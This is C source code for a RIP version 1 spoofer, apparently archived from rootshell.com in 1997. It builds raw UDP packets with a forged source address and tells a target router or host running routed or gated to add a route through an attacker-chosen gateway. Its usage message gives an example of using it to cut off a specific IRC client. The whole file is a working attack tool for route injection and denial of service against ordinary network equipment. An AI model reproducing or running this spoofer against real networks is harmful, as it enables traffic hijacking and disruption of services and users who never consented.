[ http://www.rootshell.com 11/24/97 ]

/*
 * RIP (Routing Information Protocol) Version 1 Spoofer
 *
 * (C) 1996 Kit Knox <kit@connectnet.com>
 *
 * Example usage:
 * rip 1.1.1.1 2.2.2.2 3.3.3.3
 *
 * This would tell machine/router 2.2.2.2 to add a route for 3.3.3.3
 * with a gateway of 1.1.1.1
 *
 * If the box is a UNIX machine, it must be running gated/routed.
 * Many other normal routers support RIPV1 as well (Cisco, Ascend,
 * Livingston, etc)  Mileage may vary.
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <linux/udp.h>
#include <netinet/protocols.h>
#include <netdb.h>
#include <protocols/routed.h>
#include <linux/route.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long  int saddr, daddr;
char *data;
{  
  struct iphdr  ip;
  struct udphdr udp;
  static char packet[8192];

  /* Fill in IP header values. */
  ip.ihl      = 5;
  ip.version  = 4;
  ip.tos      = 0;
  ip.tot_len  = htons(28 + datalen);
  ip.id       = htons(31337 + (rand()%100));
  ip.frag_off = 0;
  ip.ttl      = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check    = 0;
  ip.saddr    = saddr;
  ip.daddr    = daddr;
  ip.check    = in_cksum((char *)&ip, sizeof(ip));

  /* Fill in UDP header values. Checksums are unnecassary. */
  udp.source = htons(sport);
  udp.dest   = htons(dport);
  udp.len    = htons(8 + datalen);
  udp.check  = (short) 0;

  /* Copy the headers into our character array. */
  memcpy(packet, (char *)&ip, sizeof(ip));
  memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
  memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

  return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
         (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */
unsigned int lookup(host)
char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr(host);	/* Try if it's a "127.0.0.1" style string */
  if (addr == -1) 		/* If not, lookup the host */
  {
    he = gethostbyname(host);
    if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
      return 0;

    bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
  }
  return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
  unsigned int saddr, daddr, rt_to_add;
  struct sockaddr_in sin;
  int s;
  struct rip rp;
  struct netinfo *ni = rp.rip_nets;
  /* Heh, a little wacky.. but it worked */
  register struct sockaddr_in *sin2 = (struct sockaddr_in *)&ni->rip_dst;

  if(argc != 4)
    errs("Usage: %s <source_addr> <dest_addr> <route>\n\nsource = bogus host on the same netmask as dest\ndest = actual router or host running RIP\nroute = target system\n\nExample: For stealth to remove client 1.2.3.4\n         rip 206.26.140.254 irc.stealth.net 1.2.3.4\n",argv[0]);

  /* Open raw socket. */
  if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err("Unable to open raw socket.\n");

  setuid(getuid());	/* back to real user, if suid root, for security */

  /* Resolve Addresses. */
  if(!(saddr = lookup(argv[1])))
    err("Unable to lookup source address.\n");
  if(!(daddr = lookup(argv[2])))
    err("Unable to lookup destination address.\n");
  if(!(rt_to_add = lookup(argv[3])))
    err("Unable to lookup route address.\n");

  sin.sin_family     = AF_INET;
  sin.sin_addr.s_addr= daddr;
  sin.sin_port       = 520;
  /* Fill in RIP packet info */
  rp.rip_cmd = RIPCMD_RESPONSE;
  rp.rip_vers = RIPVERSION; /* Must be version 1 */
  ni->rip_dst.sa_family = htons(AF_INET);
  ni->rip_metric = htonl(1);
  memcpy(rp.rip_nets, ni, sizeof(ni));
  sin2->sin_addr.s_addr = rt_to_add;
  if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1)
  {
    perror("sendpkt_udp");
    err("Error sending the UDP packet.\n");
  }
}